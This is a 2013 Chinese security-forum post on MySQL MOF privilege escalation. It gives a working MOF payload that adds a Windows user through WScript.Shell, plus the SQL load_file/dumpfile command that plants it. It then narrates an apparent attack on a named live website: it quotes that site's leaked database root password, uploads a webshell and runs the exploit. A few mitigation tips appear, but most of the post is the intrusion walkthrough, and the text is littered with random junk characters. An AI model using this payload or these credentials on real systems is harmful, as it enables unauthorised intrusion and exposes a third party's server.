中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]

作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
* }, l  t9 G' W. c& L2 T, T( k' \: K" [1 k$ K% H; c. M
网上公开的一些利用代码:+ r( ~8 i0 i& ]; I! l9 e4 m( F

" t* O( A3 q1 ?0 e. g) T2 ]- E  s#pragma namespace(“\\\\.\\root\\subscription”)# ?3 W0 k8 g* f0 P

, i; k8 h* X' l4 Dinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };8 O8 p& {0 ]% C) h
& \: f% W% w" f; S  O4 H7 G( @
, k7 c4 @% E( g, U1 U& p
  I, g9 v+ ^& l- n# G

& c! _3 m8 O1 [& ?0 Q( J' u  }3 f. Q* D  `. u
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
; ^2 x2 G" O* s' k. b4 [7 h3 G' h从上面代码来看得出解决办法:( O# n- s0 V9 m5 }2 q- T
: r  S- r; a* }" e
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数' P) T! b4 S$ W# v- q

# b# m9 w; p/ U, W- M. g2、禁止使用”WScript.Shel”组件
; ~1 i% z+ C: M' b1 a
+ n$ n$ r" I/ R9 n, o( [2 r3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER4 k/ c& t0 J- p: i6 C, _0 K2 N; ]9 R

2 o6 p0 I2 i5 v当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下) @5 Z) w5 d! I& n, }  U' @

1 G0 w1 ~3 a; P" K8 O事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
; @8 V# s1 D3 \  H
, O2 b5 L, g7 m' g1 u  o但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
7 A/ j5 ~0 @; `2 V6 s$ q% W
4 f. D9 ?9 j+ ?+ H7 Y$ t看懂了后就开始练手吧4 c7 c* F% [- m$ b8 o% N

" z8 Y3 L, J, J1 Y: Dhttp://www.webbmw.com/config/config_ucenter.php 一句话 a
) p8 l0 ~$ e% h: K! z# j$ K( C% X& p1 v/ ~" Q/ k( {# W# v
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
2 q+ S" y# p6 ?" _' G
' _" `. i* Q2 d! V7 Q1 i% F0 U于是直接用菜刀开搞& X; e  \5 D! F7 q* ]% H+ W( V
3 F' U3 B, B; J9 [0 E6 n1 {
上马先
5 H& z- ?3 w* W* ^9 N6 v( i, ?# t8 o6 B
既然有了那些账号 之类的 于是我们就执行吧……." i# \0 U3 k! @# Y( H/ W8 G  Y

, I% I$ m+ q9 P0 F小小的说下
. q$ S$ ?$ X6 Y; N9 G6 T+ H- C0 h& I
在这里第1次执行未成功        原因未知
. z6 e) h2 g" L( |1 ?. |% S5 K; H! ]) [- ~! F2 ]5 @
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。. S* p; M) P; Z9 `
  D- s. ^$ n/ |, _3 J* e
#pragma namespace(“\\\\.\\root\\subscription”)
9 L/ D5 p1 o, |1 P- i
# w# A1 s8 M: T/ e) minstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };# }1 n* l5 n, g( F9 S! T/ r

+ s2 x0 a( Y0 G9 M7 N( g我是将文件放到C:\WINDOWS\temp\1.mof- t6 b& z5 R4 \2 X( h

7 U' p" o2 Q$ x所以我们就改下执行的代码7 ^! N7 c8 @; m9 S7 `
1 X) c7 Y2 J% u- y8 O  a
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;9 S) `3 `8 a0 J6 ?

- [, o6 _0 j' P# B% u) I
' o% r5 m' ^7 w! ]' e
6 [& x% R% m1 C但是 你会发现账号还是没有躺在那里。。
( C* c7 w/ }, f4 `: j
" e4 J% V0 E" _2 }于是我就感觉蛋疼7 g# R. }3 _7 Z
  `9 O) e$ T4 r- P# [' `  u$ c
就去一个一个去执行 但是执行到第2个 mysql时就成功了………, u0 y7 [3 D4 [, h" {$ Y
, R: z. R8 x- Z# N
% W- Z6 g: Y. U6 y* t

- s6 p  n# D. ~0 P9 G但是其他库均不成功…
# O1 {4 M- ?5 F; }) R9 ]6 Z0 b
) D4 `7 Z  M, @% D我就很费解呀 到底为什么不成功求大牛解答…
/ S( Q+ j6 b7 K- a0 U& _7 q) `8 }% O- d4 |3 n7 \/ K: w
" g" X$ W8 ^6 A7 Y6 J, H
/ w- \7 i9 E9 u" P/ a





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2